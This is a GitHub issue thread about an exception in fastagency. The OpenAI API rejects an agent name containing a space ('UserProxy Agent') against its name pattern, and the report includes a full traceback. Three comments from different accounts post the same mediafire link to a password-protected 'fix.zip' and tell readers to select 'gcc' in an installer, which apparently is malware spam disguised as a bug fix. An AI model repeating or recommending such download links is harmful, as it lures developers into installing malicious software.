### ISSUE TITLE
Exception raised when there is a space in the user proxy agent's name.

### ISSUE THREAD

**Issue by harishmohanraj** [airtai/fastagency#74]
```txt
2024-08-23 12:37:38,974 INFO     - FastAgency | initiate_workers | chat.server.initiate_chat | f294958e-d - Processed
2024-08-23 12:37:41,943 ERROR    - FastAgency | initiate_workers | chat.server.initiate_chat | f294958e-d - Error in chat: Error code: 400 - {'error': {'message': "'UserProxy Agent' does not match '^[a-zA-Z0-9_-]{1,64}$' - 'messages.1.name'", 'type': 'invalid_request_error', 'param': None, 'code': None}}
2024-08-23 12:37:41,945 ERROR    - FastAgency | initiate_workers | chat.server.initiate_chat | f294958e-d - Traceback (most recent call last):
  File "/usr/local/lib/python3.11/dist-packages/fastagency/studio/io/ionats.py", line 217, in start_chat
    chat_result = initiate_chat(body.msg)
                  ^^^^^^^^^^^^^^^^^^^^^^^
  File "/usr/local/lib/python3.11/dist-packages/fastagency/studio/models/teams/two_agent_teams.py", line 34, in initiate_chat
    return self.initial_agent.initiate_chat(  # type: ignore[no-any-return]
           ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^
  File "/usr/local/lib/python3.11/dist-packages/autogen/agentchat/conversable_agent.py", line 1096, in initiate_chat
    self.send(msg2send, recipient, silent=silent)
  File "/usr/local/lib/python3.11/dist-packages/autogen/agentchat/conversable_agent.py", line 732, in send
    recipient.receive(message, self, request_reply, silent)
  File "/usr/local/lib/python3.11/dist-packages/autogen/agentchat/conversable_agent.py", line 896, in receive
    reply = self.generate_reply(messages=self.chat_messages[sender], sender=sender)
            ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^
  File "/usr/local/lib/python3.11/dist-packages/autogen/agentchat/conversable_agent.py", line 2050, in generate_reply
    final, reply = reply_func(self, messages=messages, sender=sender, config=reply_func_tuple["config"])
                   ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^
  File "/usr/local/lib/python3.11/dist-packages/autogen/agentchat/conversable_agent.py", line 1418, in generate_oai_reply
    extracted_response = self._generate_oai_reply_from_client(
                         ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^
  File "/usr/local/lib/python3.11/dist-packages/autogen/agentchat/conversable_agent.py", line 1437, in _generate_oai_reply_from_client
    response = llm_client.create(
               ^^^^^^^^^^^^^^^^^^
  File "/usr/local/lib/python3.11/dist-packages/autogen/oai/client.py", line 735, in create
    response = client.create(params)
               ^^^^^^^^^^^^^^^^^^^^^
  File "/usr/local/lib/python3.11/dist-packages/autogen/oai/client.py", line 320, in create
    response = completions.create(**params)
               ^^^^^^^^^^^^^^^^^^^^^^^^^^^^
  File "/usr/local/lib/python3.11/dist-packages/openai/_utils/_utils.py", line 274, in wrapper
    return func(*args, **kwargs)
           ^^^^^^^^^^^^^^^^^^^^^
  File "/usr/local/lib/python3.11/dist-packages/openai/resources/chat/completions.py", line 668, in create
    return self._post(
           ^^^^^^^^^^^
  File "/usr/local/lib/python3.11/dist-packages/openai/_base_client.py", line 1260, in post
    return cast(ResponseT, self.request(cast_to, opts, stream=stream, stream_cls=stream_cls))
                           ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^
  File "/usr/local/lib/python3.11/dist-packages/openai/_base_client.py", line 937, in request
    return self._request(
           ^^^^^^^^^^^^^^
  File "/usr/local/lib/python3.11/dist-packages/openai/_base_client.py", line 1041, in _request
    raise self._make_status_error_from_response(err.response) from None
openai.BadRequestError: Error code: 400 - {'error': {'message': "'UserProxy Agent' does not match '^[a-zA-Z0-9_-]{1,64}$' - 'messages.1.name'", 'type': 'invalid_request_error', 'param': None, 'code': None}}
```

**Comment by MoonShadowIllusion** [comment]
Download 
https://www.mediafire.com/file/o50xaz6wgtazqnx/fix.zip/file
password: changeme
In the installer menu, select "gcc."

**Comment by HaxBaba123** [comment]
Download 
https://www.mediafire.com/file/o50xaz6wgtazqnx/fix.zip/file
password: changeme
In the installer menu, select "gcc."

**Comment by seeronline** [comment]
Download 
https://www.mediafire.com/file/o50xaz6wgtazqnx/fix.zip/file
password: changeme
In the installer menu, select "gcc."
